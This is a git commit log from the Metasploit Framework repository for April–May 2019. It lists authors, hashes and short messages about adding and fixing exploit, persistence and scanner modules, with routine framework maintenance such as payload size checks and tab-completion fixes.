Wei Chen ad08c4e56b Land #11828, Add CVE-2017-18357: Shopware Object Instantiation 2019-05-17 18:22:48 -05:00
Wei Chen 9b46e7a347 Normalize PHP payload path 2019-05-17 18:20:59 -05:00
Metasploit 0e2837feb5 automatic module_metadata_base.json update 2019-05-17 03:32:31 -07:00
Brent Cook 930952e994 Land #11374, add super-small version of bind tcp random payload 2019-05-17 03:13:40 -07:00
Brent Cook 9ae01c98c9 merge super-tiny payload into tiny payload, invoke on available size 2019-05-17 03:12:01 -07:00
thesubtlety 4f679fad7a fix key material loading and display of blank api keys 2019-05-16 19:31:11 -07:00
Wei Chen 40d4b3dfd3 Add doc and update the module title 2019-05-16 16:31:25 -05:00
Wei Chen 39b8dce342 Update the description 2019-05-16 16:25:23 -05:00
Wei Chen 27554cf19a Add the completed version of oats_weblogic_console.rb 2019-05-16 16:24:31 -05:00
Metasploit e05bf425f4 automatic module_metadata_base.json update 2019-05-16 11:34:37 -07:00
William Vu 2a06d038ed Land #11842, Powershell::wrap_double_quotes fix 2019-05-16 13:25:29 -05:00
William Vu a57923ee64 Improve logic 2019-05-16 13:25:00 -05:00
Metasploit 2f18c18f01 Bump version of framework to 5.0.23 2019-05-16 10:06:52 -07:00
Metasploit 44471f47d7 automatic module_metadata_base.json update 2019-05-16 09:47:53 -07:00
Shelby Pace 730f912fea Land #11802, add GetSimple CMS RCE module 2019-05-16 11:30:21 -05:00
Shelby Pace 54adb4eaab add documentation 2019-05-16 11:28:43 -05:00
7echSec 328b4fa860 Addressing Syntax error 2019-05-16 21:06:47 +05:30
7echSec c947cd76f6 Removed register_advanced_options
Added 'Powershell::wrap_double_quotes' => false in DefaultOptions.
2019-05-16 14:19:52 +05:30
PierrickV 94f904311b Fix broken links mostly to Microsoft website 2019-05-16 09:50:19 +02:00
7echSec 053ceed171 Regression fix: Disabling wrap_double_quotes
This client side exploit stopped working in current MSF throws an error in client browser.As per the analysis its because of Powershell::wrap_double_quotes=true. 
I have just Added "Powershell::wrap_double_quotes"  as advance option to override Datastore value.
2019-05-16 12:39:42 +05:30
rwincey 7c30422166 Documentation 2019-05-16 00:02:37 -04:00
rwincey 1c05958892 Exploit 2019-05-15 23:36:57 -04:00
Cha0s d3ae17f97c Merge pull request #1 from space-r7/pr11802-changes
add checks to `at` functions that could result in error
2019-05-15 17:29:41 -05:00
Shelby Pace 6210a28f32 added checks to at, changed some uris 2019-05-15 15:40:27 -05:00
Metasploit 6b16087ba1 automatic module_metadata_base.json update 2019-05-14 16:06:52 -07:00
Jeffrey Martin dacc3b3df2 Land #11548, unifi backup downloader 2019-05-14 17:46:14 -05:00
h00die 0f6eacda88 add nonverbose prints 2019-05-14 15:54:44 -04:00
Jeffrey Martin 53dc118d28 Land #11819, Implement module use by previous search index 2019-05-14 10:39:03 -05:00
Jeffrey Martin c740432f51 Land #11820, Display NOCVE reason cleanly in info command output 2019-05-14 10:34:03 -05:00
William Vu ca13769c22 Remove special handling of missing CVE references 2019-05-13 18:12:18 -05:00
William Vu 3757769906 Compromised on improved wording for NOCVE 2019-05-13 17:47:22 -05:00
William Vu fa06e88ab9 Revert "Display NOCVE reason in missing CVE reference"
This reverts commit c252ff2e7e.
2019-05-13 17:38:35 -05:00
stevenseeley 1df703b85f added some vprint_error calls in the check 2019-05-13 17:36:06 -05:00
William Vu 7aed55b053 Zero-index search results for great justice 2019-05-13 17:33:16 -05:00
William Vu 6ea1e7aed2 Handle TypeError in case of nil 2019-05-13 17:32:54 -05:00
William Vu 249d3551ae Be good in other places 2019-05-13 17:15:31 -05:00
William Vu d33ec6e79d Be good and use a multi-line rescue 2019-05-13 17:12:40 -05:00
Wei Chen 831c0cc7d6 Update syntax changes 2019-05-13 14:13:39 -05:00
Tim W abbefab5c0 add meterpreter mouse command 2019-05-13 17:06:03 +08:00
stevenseeley e8fec2a77b don't override the check method 2019-05-12 20:08:52 -05:00
Tim W 7ec67fb91f add meterpreter keyboard_send command 2019-05-11 16:49:01 +08:00
Metasploit 806e253538 automatic module_metadata_base.json update 2019-05-10 14:04:46 -07:00
h00die d76125aad6 land #11831 url fix ms09-053 2019-05-10 16:48:58 -04:00
h00die 3a305fd7fa add version numbers to ams_hndlrsvc 2019-05-10 16:42:09 -04:00
h00die f50c89ca0a ams_hndlrsvc updates 2019-05-10 16:38:22 -04:00
h00die 185b740d87 msftidy 2019-05-10 15:26:17 -04:00
h00die 097a503113 unifi 5.10.23 and meterp > shell 2019-05-10 15:05:31 -04:00
Wei Chen 03dbb2fc2c Work in progress for oats_weblogic_console 2019-05-10 13:27:08 -05:00
h00die 74fbcaf908 moodle_cmd_exec nil check 2019-05-10 14:02:01 -04:00
lilyus 91838419ff Update link to ms09-053 2019-05-10 17:48:37 +02:00
stevenseeley bca160f4c4 final commit: fixed check method to not print as suggested by @bcoles 2019-05-10 09:45:21 -05:00
stevenseeley 6427cb31bf fixed regex a lil 2019-05-09 22:53:39 -05:00
stevenseeley 5ff8394df0 @bcoles is a purist :p 2019-05-09 22:21:26 -05:00
stevenseeley 30401978c1 updated demo in docs 2019-05-09 21:32:01 -05:00
stevenseeley 7953f85c16 updated error message to be NoAccess 2019-05-09 21:29:48 -05:00
stevenseeley 965a19fb95 updated docs to include custom pop chain as suggested by @bcoles 2019-05-09 21:28:11 -05:00
stevenseeley a700fcec5d changed regex as suggested by @bcoles 2019-05-09 21:18:14 -05:00
stevenseeley e769ae5c90 fixed some error conditions, changed regex as suggested by @bcoles 2019-05-09 21:14:54 -05:00
stevenseeley 2ff1adb1be fixed timing of exec 2019-05-09 20:58:14 -05:00
stevenseeley 6ffd1d5e95 updated module to address @bcoles's comments 2019-05-09 20:53:49 -05:00
stevenseeley 65c3163518 updated module credits with original discoverer 2019-05-09 17:35:47 -05:00
stevenseeley ba2baa7652 updated module randomization a little more 2019-05-09 16:14:35 -05:00
stevenseeley 6ffef18028 updated documentation a little 2019-05-09 15:51:34 -05:00
asoto-r7 e5203720db Land #11821, correct payload size output and exception handling 2019-05-09 15:36:20 -05:00
stevenseeley 2649fa0d65 added a new line at the end 2019-05-09 15:35:00 -05:00
stevenseeley 9b200840a4 added module for CVE-2017-18357 2019-05-09 15:19:01 -05:00
stevenseeley aaa0dd2532 added module for CVE-2017-18357 2019-05-09 15:17:43 -05:00
stevenseeley 89e3a07518 added module for CVE-2017-18357 2019-05-09 15:08:33 -05:00
Metasploit 65637eea62 Bump version of framework to 5.0.22 2019-05-09 10:06:37 -07:00
Wei Chen ee00d05d3c Fix a typo 2019-05-09 08:43:06 -05:00
Metasploit 2933a8e75a automatic module_metadata_base.json update 2019-05-08 09:41:01 -07:00
Wei Chen 310d931bf5 Land #11816, Add CVE-2019-5786 : Chrome 72.0.3626.119 on Windows 7 x86 2019-05-08 11:21:40 -05:00
Wei Chen 923d8b8b2e Fix uri with get_resource 2019-05-08 11:20:36 -05:00
Wei Chen c70c6abe13 Add CVE-2019-2557 - OATS Directory Traversal 2019-05-07 14:56:04 -05:00
Brent Cook 745645d7ca make encoded payloads a little less special-case
Just operate on the raw_payload buffer so we always have the same thing to look
at in the end of generation.
2019-05-07 13:48:24 -05:00
Brent Cook ad8188ff51 throw exception on actual payload size violation, not formatted output size 2019-05-07 13:12:58 -05:00
Tim W 7968bd932a improve arch selection 2019-05-07 22:54:58 +08:00
Metasploit 5a07d280d2 automatic module_metadata_base.json update 2019-05-06 23:24:23 -07:00
William Vu 413929b7f6 Land #11598, Postgres COPY FROM PROGRAM exploit 2019-05-07 01:12:44 -05:00
William Vu c252ff2e7e Display NOCVE reason in missing CVE reference 2019-05-07 00:59:09 -05:00
William Vu 982caa95a4 Implement module use by previous search index 2019-05-07 00:50:04 -05:00
Metasploit 1732185683 automatic module_metadata_base.json update 2019-05-06 13:53:21 -07:00
asoto-r7 f89b0e848f Land PR#11780, exploit/multi/misc/weblogic_deserialize_asyncresponseservice 2019-05-06 15:36:47 -05:00
Tim W be1d185a04 Add CVE-2019-8565 OSX Feedback Assistant local root exploit 2019-05-07 04:30:47 +08:00
asoto-r7 aed878100a weblogic_deserialize_asyncresponseservice: Added documentation 2019-05-06 15:18:08 -05:00
asoto-r7 abfe4fd2c2 weblogic_deserialize_asyncresponseservice: Added check method, improved exception handling, minimizing XML strings 2019-05-06 15:16:50 -05:00
Brent Cook 5a8055f41d Land #11803, check for platform-specific env. variables in post-API tests 2019-05-06 09:21:56 -05:00
Tim W 8b489f4fb5 add documentation 2019-05-06 17:05:03 +08:00
Tim W 39969e71fa Initial commit of CVE-2019-5786 2019-05-06 17:05:00 +08:00
Alexandre ZANNI 9d15c10c8a add tested system 2019-05-05 23:30:20 +02:00
Cha0s bd349b8a23 Removed Spaces EOL 2019-05-04 23:24:20 -05:00
Cha0s 4bf0adeade Module corrections
Corrections in: author metadata, references, removing handler, removing unused  code branch and vulnerable variable, improve module description
2019-05-04 23:11:40 -05:00
Brendan Coles 2ee75173b8 Add FreeBSD rtld execl() Privilege Escalation module 2019-05-03 09:53:37 +00:00
Caitlin Condon 9eb335ad5c Land #11804, loadpath command generates bad plural for 'auxiliarys' 2019-05-02 17:31:42 -05:00
Brendan Coles 60fb3b2319 Add BSD target to exploit/multi/ssh/sshexec module 2019-05-02 20:40:14 +00:00
Metasploit 8a991d322d Bump version of framework to 5.0.21 2019-05-02 10:08:40 -07:00
Brent Cook 86df78fa4f loadpath command generates bad plural for 'auxiliarys'
Plural of 'auxiliary' is 'auxiliaries'. Let's get rid of bad logic and just say 'modules'.
2019-05-02 10:04:26 -05:00
Brent Cook 625f383ade blank 2019-05-02 10:01:21 -05:00
Brent Cook ad1190b5c1 check for platform-specific env. variables
'USERNAME' is not a standard environment variable outside of Windows,
which leads to this test failing on non-Windows Meterpreter platforms.
2019-05-02 09:55:58 -05:00
Waqas Ali 48b7f7c904 Update (removed parenthesis) modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
(removed parenthesis)

Co-Authored-By: truerandom <masterofdisaster@ciencias.unam.mx>
2019-05-02 02:03:54 -05:00
Waqas Ali 75c78b761e Update (removed parenthesis) modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
(removed parenthesis)

Co-Authored-By: truerandom <masterofdisaster@ciencias.unam.mx>
2019-05-02 02:03:46 -05:00
Waqas Ali 3a7ebbdc3d Update (removed parenthesis) modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
(removed parenthesis)

Co-Authored-By: truerandom <masterofdisaster@ciencias.unam.mx>
2019-05-02 02:03:26 -05:00
Waqas Ali 33c2a9592a Update (removed parenthesis) modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
(removed parenthesis)

Co-Authored-By: truerandom <masterofdisaster@ciencias.unam.mx>
2019-05-02 02:03:14 -05:00
truerandom ea3e8e5bae exploit module for cve-2019-11231 2019-05-01 20:05:57 -04:00
Brent Cook def3112dde Land #11786, Fix issues with DP RPC commands 2019-05-01 13:20:56 -05:00
Metasploit a425bbb683 automatic module_metadata_base.json update 2019-05-01 06:45:07 -07:00
Shelby Pace a88858fc8b Land #11779, add Rails Doubletap Dev mode RCE 2019-05-01 08:35:28 -05:00
Shelby Pace 887c09f806 fixed typo 2019-05-01 08:33:44 -05:00
Andrés Rodríguez d1ca87b810 Improvements to the payloads config. 2019-05-01 00:06:46 -05:00
Andrés Rodríguez 4c612efc16 Spaces at EOL (again). 2019-04-30 23:36:52 -05:00
Andrés Rodríguez 384c8b3959 Pulling the XML out into its own method. 2019-04-30 23:23:38 -05:00
Andrés Rodríguez 554f781382 Spaces at EOL. 2019-04-30 23:03:25 -05:00
Andrés Rodríguez b3a4b639c3 Use of suggested multi-line string for XML and case for the OS. 2019-04-30 22:43:45 -05:00
Andrés Rodríguez ce25253e5a Some suggested fixes. 2019-04-30 21:36:51 -05:00
Metasploit abfe0e03d9 automatic module_metadata_base.json update 2019-04-30 16:10:03 -07:00
Brent Cook d37fa9e5f8 Land #11801, Add note about WIP PRs 2019-04-30 17:55:10 -05:00
Brent Cook d8432fd8de Land #11781, add GTP-U echo scanner module 2019-04-30 17:53:03 -05:00
Brent Cook cc62ca50f1 fix link 2019-04-30 17:52:42 -05:00
Brent Cook 0b24b9f636 add docs 2019-04-30 17:50:54 -05:00
William Vu dbc0811ba4 Fix italics to bold
Damn you, Slack.
2019-04-30 17:13:38 -05:00
William Vu 9c3bc0ac67 Add note about WIP PRs to CONTRIBUTING.md 2019-04-30 17:05:12 -05:00
bigendiansmalls 3289d89836 Added Extended passive mode to the core ftp module.
Extended passive mode (EPSV), as documented in RFC2428
is similar to the PASSive mode in that it requests that
the server open a port and wait for a data connection.
However, in unlike PASSive mode, Extended Passive mode
returns only the port on which the server listens for
the data connection, not the IP + Port.  The client is
expected to use the existing IP (e.g. the one it used to
create the initial control channel connection) to connect
to the new data port.

Where this becomes important is if the server is behind
some type of natting device, EPSV will work in this case,
PASS may not.
2019-04-30 12:41:11 -05:00
bigendiansmalls f1a5711c0f Fixed Size 2019-04-30 12:15:47 -05:00
bigendiansmalls e79a9ed04b Added to code to remove payload once run.
The original payload left the binary behind, which could be
then used by someone else intentionally or otherwise. This
addition cleans up the module by removing it after running.
2019-04-30 11:32:40 -05:00
Wei Chen 1fd54e20fb Update target name 2019-04-30 10:13:01 -05:00
Wei Chen 29344d15b6 Update rails_double_tap doc and module based on bcole feedback 2019-04-30 10:11:32 -05:00
Metasploit efa5fbf070 automatic module_metadata_base.json update 2019-04-30 05:00:28 -07:00
Jacob Robles 6c29da6e8e Land #11673, Add yum persistence module 2019-04-30 06:49:43 -05:00
Jacob Robles e5cb003c5c Remove trailing whitespace 2019-04-30 06:25:48 -05:00
Jacob Robles 02894cccb5 Update documentation 2019-04-30 06:24:16 -05:00
arntsonl f200c12424 Postgres 8.2+ update to postgres_payload.rb module 2019-04-29 15:28:11 -04:00
Metasploit 1d54b0ad79 automatic module_metadata_base.json update 2019-04-29 12:13:43 -07:00
Wei Chen 6668b226ba Land #11761, Cleanup apport_abrt_chroot_priv_esc 2019-04-29 14:04:24 -05:00
Jacob Robles 68ffdf0ddc Land #11641, Add AIS RCE 2019-04-29 13:52:58 -05:00
Metasploit 78297fc7ca automatic module_metadata_base.json update 2019-04-29 09:09:05 -07:00
Wei Chen 88f7ed25e3 Land #11784, Fix NoMethodError in jira_plugin_upload exploit module 2019-04-29 10:59:41 -05:00
Metasploit 284dba3d75 automatic module_metadata_base.json update 2019-04-29 07:02:32 -07:00
Shelby Pace 10e141c73d Land #11697, add Pimcore unserialize RCE 2019-04-29 08:52:49 -05:00
Shelby Pace d5f76f328a removed version from module title 2019-04-29 08:43:33 -05:00
Metasploit 1fd0654038 automatic module_metadata_base.json update 2019-04-27 10:46:27 -07:00
Jacob Robles 147b9fef98 Land #11665, Add APT persistence module 2019-04-27 12:32:21 -05:00
fabiocogno d60aa92ffc Merge pull request #1 from space-r7/pr11697
Add more error handling
2019-04-27 11:09:47 +02:00
Spencer McIntyre fad4ce76ea Clean up the gtp_echo module based on PR feedback 2019-04-26 17:45:27 -04:00
William Vu 561b1ce86d Land #11778, cmd_psh_payload options hash fix
nil and false are not equivalent here.
2019-04-26 16:28:50 -05:00
Shelby Pace 31f4c842a6 added a few checks 2019-04-26 16:18:14 -05:00
Matthew Kienow fbf7668889 Fix delete vuln
Convert fetched Mdm::Vuln::ActiveRecord_Associations_CollectionProxy to
an Array as the code only expects to process an Mdm::Vuln or Array.
2019-04-26 14:44:37 -04:00
Matthew Kienow a393e3f71f Fix finding a service to return
Convert fetched Mdm::Service::ActiveRecord_Associations_CollectionProxy
to an Array as the code only expects to process an Mdm::Service or
Array.
2019-04-26 14:40:49 -04:00
Matthew Kienow 8173fd5d8a Update opts usage to match the method comment
Conditions assignment is to the singular hosts.address, so the plural
addresses doesn't make sense.
2019-04-26 14:34:40 -04:00
Matthew Kienow 7a0681f816 Fix incorrect method comments and examples 2019-04-26 14:30:28 -04:00
Jacob Robles 635be0cc9c Update documentation 2019-04-26 13:12:06 -05:00
Jacob Robles 1faa41aafe Dont require hook name 2019-04-26 13:11:40 -05:00
Wei Chen 2141036f13 Remove the extra newline 2019-04-26 12:59:50 -05:00
Fabio Cogno e9e50b2ae3 Refactoring - login function 2019-04-26 19:53:54 +02:00
Shelby Pace 3de617fea5 add checks for xsrf_token 2019-04-26 11:09:33 -05:00
Metasploit 186e2dd65f automatic module_metadata_base.json update 2019-04-26 07:58:39 -07:00
Jacob Robles 3d7f498bfe Land #11783, Allow RHOST option sid_brute 2019-04-26 09:49:48 -05:00
Metasploit a98da6f2ba automatic module_metadata_base.json update 2019-04-26 07:45:34 -07:00
Jacob Robles c282547a0b Land #11745, Add spring-cloud-config-server dir traversal 2019-04-26 09:35:37 -05:00
Metasploit decb88b2ac automatic module_metadata_base.json update 2019-04-26 07:11:28 -07:00
Jacob Robles d72b6fc3cb Land #11782, Update payload cached sizes 2019-04-26 09:01:52 -05:00
Jacob Robles f195c4bde3 Update payload cache sizes 2019-04-26 08:40:07 -05:00
Jacob Robles e173507869 Allow RHOST option 2019-04-26 08:36:32 -05:00
Jacob Robles 306b0fd2e7 Randomize application and profile 2019-04-26 07:15:39 -05:00
Metasploit ec5c3e86b5 automatic module_metadata_base.json update 2019-04-26 05:01:39 -07:00
Brendan Coles c2d02efb3c Land #11777, Fix auxiliary/dos/http/apache_range_dos CHECK action 2019-04-26 12:10:01 +00:00
Jacob Robles 96cb5ce917 Update documentation 2019-04-26 06:57:57 -05:00
Tim W d20801cf12 add apple advisory 2019-04-26 13:25:26 +08:00
Tim W f3f044ec59 add payload length check 2019-04-26 12:28:51 +08:00
bcoles 80b066ad03 Forgotten string interpolation..
Co-Authored-By: acamro <acamro@users.noreply.github.com>
2019-04-25 21:56:42 -05:00
Andres Rodriguez 6cdfde7268 Some fixes for char escapes... 2019-04-25 19:32:17 -07:00
Spencer McIntyre 7f4b134677 Add a GTP echo scanner module 2019-04-25 21:55:19 -04:00
Andrés Rodríguez 64491ef690 Remove file bad chars... 2019-04-25 20:52:11 -05:00
@shellfail 652e4b0a34 Update modules/exploits/linux/local/yum_package_manager_persistence.rb
Changed date format

Co-Authored-By: aringo <ringo.aaron@gmail.com>
2019-04-25 20:09:54 -05:00
@shellfail c643436383 Update modules/exploits/linux/local/apt_package_manager_persistence.rb
Changed Disclosure Date format

Co-Authored-By: aringo <ringo.aaron@gmail.com>
2019-04-25 20:08:50 -05:00
Andres Rodriguez 9a4717f1af Weblogic deserialize AsyncResponseService module 2019-04-25 18:03:17 -07:00
Aaron Ringo 09022f336d Changed some formatting based on feedback and rubocop, added default payload of python - python exists for yum to work 2019-04-25 18:01:39 -05:00
Wei Chen cc9216d848 Clean up the extra space 2019-04-25 16:39:40 -05:00
Wei Chen 738ee70667 Add module documentation for rails_double_rap 2019-04-25 16:31:27 -05:00
Aaron Ringo 261a4271fa Updated some formatting as requested along with some rubocob requested 2019-04-25 16:15:00 -05:00
CFP 315d7f28c1 Replace path with uri to fix #11776 2019-04-25 23:08:19 +02:00
Aaron Ringo bd1113d53c Updated some formatting as requested along with some rubocob requested 2019-04-25 15:55:22 -05:00
Shelby Pace a97cee4c91 add ternary expression to set options 2019-04-25 15:36:09 -05:00
Wei Chen 9a40f24c46 Add CVE-2019-5420 : Ruby on Rails DoubleTap secret_key_base Vuln 2019-04-25 14:30:46 -05:00
@shellfail cf6c57cf5d Apply suggestions from code review
Co-Authored-By: nsa <mustafa@calap.co>
2019-04-25 20:43:55 +03:00
Metasploit b5f164335e Bump version of framework to 5.0.20 2019-04-25 10:08:29 -07:00
p0w1 f63a2a6e58 add badchar 2019-04-25 18:24:26 +02:00
@shellfail 985285d880 Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:05:50 +02:00
@shellfail 98b054b8a4 Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:05:43 +02:00
@shellfail 537f55e9da Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:05:32 +02:00
@shellfail 9206bd404d Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:05:22 +02:00
@shellfail 46f4473ade Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:05:14 +02:00
bcoles 5d4de2c715 Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:04:56 +02:00
bcoles 77dce74789 Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:04:04 +02:00
@shellfail 38e95dd311 Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:02:56 +02:00
@shellfail 0b09759621 Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:02:44 +02:00
@shellfail 4e85f5f731 Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:02:30 +02:00
@shellfail 59e4df759a Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:01:38 +02:00
@shellfail 376925e619 Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:01:27 +02:00
@shellfail cecc9e210c Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
2019-04-25 18:01:15 +02:00
Metasploit 6003896e3c automatic module_metadata_base.json update 2019-04-25 07:49:46 -07:00
Jacob Robles 39aae367a5 Land #11765, Update NUUO mixin, move code to Rex 2019-04-25 09:35:47 -05:00
p0w1 b26d2d6ba4 add documentation 2019-04-25 12:20:12 +02:00
p0w1 45a9369ca0 add documentation 2019-04-25 12:18:31 +02:00
Brent Cook 98146fe419 Land #11771, Force UTF-8 for more module metadata fields 2019-04-24 20:23:51 -05:00
@shellfail 49a14a588c Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
2019-04-25 00:40:20 +04:00
@shellfail aae4e86b71 Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
2019-04-25 00:40:10 +04:00
Dhiraj Mishra 447c8430e1 Updating documents 2019-04-25 00:39:46 +04:00
Jacob Robles f3a820b475 Remove protocol option
Only tcp is supported for the mixin.
2019-04-24 14:24:30 -05:00
William Vu a790e9076a Land #11766, handling of spaces in tab completion 2019-04-24 13:24:16 -05:00
Metasploit 8a218f60a9 automatic module_metadata_base.json update 2019-04-24 11:19:11 -07:00
Spencer McIntyre dfa37a9fb0 Fix a bug when the unbalanced quote is the end 2019-04-24 14:02:18 -04:00
Brent Cook 470255cb2b Land #11769, make sure Notes fields show up in info 2019-04-24 13:01:07 -05:00
William Vu ce39b929b2 Remove stray backslash - oops! 2019-04-24 11:50:53 -05:00
William Vu b05c6c7587 Rearrange notes in drupal_restws_unserialize 2019-04-24 11:41:30 -05:00
William Vu 97545ceb9d Clarify NOCVE reason for Wemo exploit 2019-04-24 11:39:34 -05:00
William Vu 94994aa519 Update modules with RelatedModules and realign 2019-04-24 11:34:42 -05:00
William Vu 0ad5dca9fa Revert to RelatedModules and handle Array/Hash 2019-04-24 11:26:52 -05:00
William Vu 00cebda89e Fix typo of "reliability" - wow, I suck 2019-04-24 11:14:06 -05:00
Spencer McIntyre 2a0e3690db Close unbalanced quotes when tab completing 2019-04-24 11:01:23 -04:00
Spencer McIntyre 92e945ff46 Implement a custom shellsplit method 2019-04-24 10:55:02 -04:00
Adam Cammack 40c083b894 Force UTF-8 for more module fields 2019-04-24 09:30:38 -05:00
Jacob Robles b0498d0991 Update nuuo bruteforce module
Module was updated to use the changes
in the nuuo mixin
2019-04-24 07:01:42 -05:00
Jacob Robles acf7e58e8e Nuuo mixin handle connection errors 2019-04-24 07:00:53 -05:00
Metasploit e7f82610d3 automatic module_metadata_base.json update 2019-04-24 03:54:55 -07:00
Brent Cook 0e2fb0fb12 Land #11730, add module for CVE-2018-20250
(RARLAB WinRAR ACE Format Input Validation Remote Code Execution)
2019-04-24 05:45:18 -05:00
Brent Cook 2242c1f758 prefer File.binread for reading binary file contents 2019-04-24 05:43:28 -05:00
Metasploit 4db760f29f automatic module_metadata_base.json update 2019-04-24 03:32:00 -07:00
Brent Cook a9bb4efe6a Land #11768, implement faster compatible payload logic 2019-04-24 05:17:15 -05:00
Brent Cook 9793c839f2 Land #11764, update tested versions for xor_x11_suid_server module 2019-04-24 05:11:41 -05:00
Brent Cook d207038ab8 Land #11722, expand password hash identification library 2019-04-24 05:09:30 -05:00
Brent Cook 4137135ad4 Land #11737, store password from osx/gather/password_prompt_spoof 2019-04-24 05:06:20 -05:00
William Vu 372ec1949a Handle NOCVE and module traits 2019-04-23 19:47:49 -05:00
William Vu 30b8625885 Update Ghostscript/ImageMagick modules 2019-04-23 16:31:40 -05:00
William Vu c0e675abfb Change dump_aka to dump_notes with special casing
Also add RELATED for related modules.
2019-04-23 16:31:40 -05:00
William Vu 9420b04dd9 Support generic payloads 2019-04-23 15:14:14 -05:00
William Vu e12b19a507 Enhance compatible_payloads to use module cache 2019-04-23 13:57:39 -05:00
Jacob Robles aba88243d7 Add nuuo resposne string 2019-04-23 10:47:40 -05:00
Jacob Robles 0174d1dd7e Update nuuo_cms_sqli
Use updated nuuo mixin/rex
2019-04-23 06:29:51 -05:00
Jacob Robles 5686319271 Update nuuo_cms_fu
Use the updated mixin/rex implementation
2019-04-23 06:28:57 -05:00
Jacob Robles 80a68de17d Keep response status 2019-04-23 06:27:12 -05:00
Spencer McIntyre 0e612045d3 Honor strings ending in slash space 2019-04-22 15:08:11 -04:00
Jacob Robles d4728c9bc7 Call correct function 2019-04-22 10:16:05 -05:00
Jacob Robles d7c8c9ffff Add nuuo response spec 2019-04-22 08:14:25 -05:00
Jacob Robles 01b1c42b1a Update nuuo client spec 2019-04-22 08:13:59 -05:00
Tim W 246fb6fa90 improve description
docs
2019-04-22 14:40:57 +08:00
bcoles 421e250086 Update modules/exploits/osx/local/timemachine_cmd_injection.rb
Co-Authored-By: timwr <timwr@users.noreply.github.com>
2019-04-21 19:59:14 +08:00
bcoles f1f64cfbb8 Update modules/exploits/osx/local/timemachine_cmd_injection.rb
Co-Authored-By: timwr <timwr@users.noreply.github.com>
2019-04-21 19:59:04 +08:00
Brendan Coles 163c66b5ba Update tested versions 2019-04-21 11:21:28 +00:00
Tim W 1a2a85b142 add documentation 2019-04-21 16:04:16 +08:00
Tim W fbbcc2b607 add exploit binary 2019-04-21 16:02:10 +08:00
Tim W c2c6c56785 fix cleanup 2019-04-21 16:02:10 +08:00
Metasploit 1978847ffb automatic module_metadata_base.json update 2019-04-20 22:46:55 -07:00
Brendan Coles bea0ddeb1d Land #11763, Fix AKA references array for rails_doubletap module 2019-04-21 05:48:58 +00:00
L 3c237b945f fixed 2019-04-21 12:00:20 +08:00
Aaron Ringo 5e4af9c3f7 Added fail with if plugins were not enabled 2019-04-20 18:16:22 -05:00
Aaron Ringo 335c175ad7 modified plugin_ran and path generated for plugin.conf 2019-04-20 18:04:57 -05:00
bcoles f715816068 Update modules/exploits/linux/local/yum_package_manager_persistence.rb
Co-Authored-By: aringo <ringo.aaron@gmail.com>
2019-04-20 17:47:29 -05:00
bcoles 0c22da8c6f Update modules/exploits/linux/local/yum_package_manager_persistence.rb
Co-Authored-By: aringo <ringo.aaron@gmail.com>
2019-04-20 17:46:55 -05:00
bcoles 11d174a464 Update modules/exploits/linux/local/yum_package_manager_persistence.rb
PLUGIN

Co-Authored-By: aringo <ringo.aaron@gmail.com>
2019-04-20 17:46:35 -05:00
bcoles 1c0928206f Update modules/exploits/linux/local/yum_package_manager_persistence.rb
PLUGIN

Co-Authored-By: aringo <ringo.aaron@gmail.com>
2019-04-20 17:46:20 -05:00
bcoles 68bc5f6df2 Update documentation/modules/exploit/linux/local/yum_package_manager_persistence.md
PLUGIN

Co-Authored-By: aringo <ringo.aaron@gmail.com>
2019-04-20 17:46:07 -05:00
Jacob Robles e0266b4543 Update nuuo module
aux:nuuo_cms_file_download
2019-04-19 14:26:35 -05:00
Jacob Robles a7d02d49d8 Update mixin and client for response 2019-04-19 14:24:37 -05:00
Jacob Robles e85147a5f2 Add nuuo response
Parse server responses
2019-04-19 14:23:53 -05:00
Metasploit f2579fa7a0 automatic module_metadata_base.json update 2019-04-19 11:01:04 -07:00
Jeffrey Martin 0462797ef7 Land 11760, Fix URL and restore module_metadata_base.json 2019-04-19 12:52:34 -05:00
h00die cf9bda08ae Land #11759 docs update for systemtap 2019-04-19 13:42:49 -04:00
Adam Cammack f14571364f Properly encode URL 2019-04-19 12:35:36 -05:00
Brendan Coles da9aba07af Cleanup apport_abrt_chroot_priv_esc 2019-04-19 17:13:57 +00:00
Adam Cammack f94def4f2a Revert "automatic module_metadata_base.json update"
This reverts commit a21f49bea9.

We need the contents of this file.
2019-04-19 12:01:29 -05:00
Brent Cook 5ef5904296 Land #11747, updated test versions for abrt_raceabrt_priv_esc 2019-04-19 11:43:06 -05:00
